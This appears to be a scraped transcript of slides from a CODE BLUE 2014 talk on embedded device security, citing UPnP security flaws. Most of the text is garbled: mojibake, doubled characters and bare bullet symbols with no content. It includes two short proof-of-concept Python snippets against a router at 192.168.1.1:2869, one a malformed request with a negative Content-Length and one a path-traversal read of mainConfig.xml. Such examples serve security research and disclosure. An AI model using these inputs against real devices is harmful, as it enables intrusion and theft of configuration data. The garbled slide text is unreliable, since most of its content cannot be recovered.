CODE BLUE 2014 : 日出づる国の組込セキュリティ by ベン・シュミット &...

36
)ƛAƉ ÀƑøƑƵƫǕǙƼƣ įʼnő ľŇŌŐōňŗ ėNjǛƶǞƸǟĘ ĝĝ ĭńŖŘœʼnŕőŒŗŌōőŋ Lord Commander of Security Research @NarfIndustries ļŅŘŏ ĹŅŎŒŚŖŎō ėƢƲƴƸǞƾĘ ĝĝ ĭŐŜŌőňŏ Director of World Domination @NarfIndustries

Transcript of CODE BLUE 2014 : 日出づる国の組込セキュリティ by ベン・シュミット &...

LLoorrdd CCoommmmaannddeerr ooff SSeeccuurriittyy RReesseeaarrcchh @@NNaarrffIInndduussttrriieess

DDiirreeccttoorr ooff WWoorrlldd DDoommiinnaattiioonn @@NNaarrffIInndduussttrriieess

● ● ● ● ● ● ● 

● ● ● 

o o 

● ● 

● 

● 

● 

● o o o o o o 

● o 

● ● ● 

o 

“Security Flaws in UPnP:Unplug, Don’t Play”

“Security Flaws in UPnP:Unplug, Don’t Play”

● o o 

● o 

● 

● ● 

o ! 

o ! 

o ! 

● ● 

  o 

   

import socket

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((“192.168.1.1”, 2869)) s.send('GET AAAA\r\nContent-Length: -34\r\n\r\n') s.close()

   

import requests print requests.get('http://192.168.1.1:2869/../mainConfig.xml').text

● o 

o 

o o 

o 

● 

● 

o 

● 

o 

● o 

● o 

● 

● o 

o 

●  o 

o 

● o  ない

●  seccomp_bpf() o 

● 

o 

● o 

o 

● o 

● o 

● o 

● 

o o 

● o 

o 

● o 

● 

● 

o 

o ● 

o o 

● ● ● 

o 

o o o